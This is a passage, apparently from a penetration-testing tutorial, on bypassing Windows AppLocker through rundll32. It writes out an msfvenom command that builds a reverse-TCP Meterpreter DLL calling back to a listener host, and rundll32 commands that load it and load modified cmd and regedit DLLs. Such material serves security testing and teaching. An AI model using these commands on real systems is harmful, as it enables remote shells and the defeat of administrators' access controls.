The following command needs to be executed from the command prompt. If the command prompt is locked then the method that is described below can be used to unlock the cmd.
Rundll32 will execute the arbitrary code and it will return a Meterpreter session. The main benefit of this is that since it will not touch the disk the AppLocker rule will bypassed. However PowerShell should be allowed to run on the system.
Rundll32 – Meterpreter
The Metasploit Msfvenom can be used in order to create a custom DLL that will contain a meterpreter payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=44444 -f dll -o pentestlab.dll
The utility rundll32 can then load and execute the payload that is inside the pentestlab.dll.
rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll
A meterpreter session will be opened.
In Windows systems that have locked the command prompt via an AppLocker rule it is possible to bypass this restriction by injecting a malicious DLL file into a legitimate process. Didier Stevens has released a modified version of cmd in the form of a DLL file by using an open source variant obtained from the ReactOS.
Since the rundll32 is a trusted Microsoft utility it can be used to load the cmd.dll into a process, execute the code on the DLL and therefore bypass the AppLocker rule and open the command prompt. The following two commands can be executed from the Windows Run:
rundll32 C:\cmd.dll,EntryPoint rundll32 shell32.dll,Control_RunDLL C:\cmd.dll
The code will be executed through rundll32 and the command prompt will be opened.
The same technique can be applied in systems where the registry is locked. Didier Stevens released also a modified version of registry editor in the form of a DLL like the command prompt above.
The following commands can load and run the regedit.dll via rundll32 and therefore bypass the AppLocker rule.
rundll32 C:\regedit.dll,EntryPoint rundll32 shell32.dll,Control_RunDLL C:\regedit.dll